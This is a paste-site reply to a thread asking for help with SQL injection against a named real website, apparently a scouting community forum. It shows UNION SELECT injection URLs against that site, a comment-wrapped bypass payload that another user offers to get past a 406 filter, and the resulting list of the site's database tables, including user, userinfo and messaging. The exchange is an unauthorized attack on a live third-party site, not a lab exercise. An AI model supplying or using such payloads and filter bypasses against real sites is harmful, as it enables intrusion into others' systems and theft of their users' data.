Re: SQLI Please Help [406 Not Ac

From Anonymous, 3 Years ago, written in Plain Text, viewed 62 times. This paste is a reply to SQLI Please Help [406 Not Accept from Words Suck - view diff
URL https://paste.bugabuse.net/view/33657451 Embed
Download Paste or View Raw
  1. I've been practicing SQLI..
  2.  
  3. I found this one site:
  4. http://www.scouttalk.ie
  5.  
  6. I know it is injectable because when I get to here
  7. http://www.scouttalk.ie/clan.php?orgID=null UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22--
  8.  
  9. I get the database name: 5.1.63-cll
  10.  
  11. However when I go further:
  12. http://www.scouttalk.ie/clan.php?orgID=null UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(table_name),18,19,20,21,22 from information_schema.tables where table_schema=database()--
  13.  
  14. I get a 406 NOT ACCEPTABLE error.
  15.  
  16. I know I'm most likely being blocked due to my injection method, I've tried things such as adding comment tags etc, googled around but I'm stuck.
  17.  
  18. Can someone please help me bypass this so I can get further?
  19.  
  20. http://www.scouttalk.ie/clan.php?orgID=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(/*!table_name*/),18,19,20,21,22 from information_schema.tables where table_schema=database() --
  21.  
  22. ^^^ above by warb0 --- this would bypass it :D
  23.  
  24. tables in db:
  25. IPlog
  26. allunitslist
  27. article
  28. articlecomment
  29. badges
  30. clanforum
  31. clannews
  32. countryforum
  33. countrynews
  34. event
  35. eventcomment
  36. game
  37. gamecomment
  38. globalforum
  39. globallibrary
  40. globalnews
  41. journal
  42. journalcomment
  43. listing
  44. listingcomment
  45. messaging
  46. newclan
  47. orders
  48. org
  49. orgcomment
  50. patrolforum
  51. patrolnews
  52. photo
  53. photocomment
  54. poll
  55. pollcomment
  56. radio
  57. radiocomment
  58. ranklist
  59. recommended
  60. regionforum
  61. regionnews
  62. sectionforum
  63. sectionnews
  64. stickit
  65. talkbox
  66. talkboxreplies
  67. temp
  68. tips
  69. unitforum
  70. unitnews
  71. user
  72. useralert
  73. userdesc
  74. userinfo
  75. userstatus
  76. visitor
  77.  

Reply to "Re: SQLI Please Help [406 Not Ac"

Here you can reply to the paste above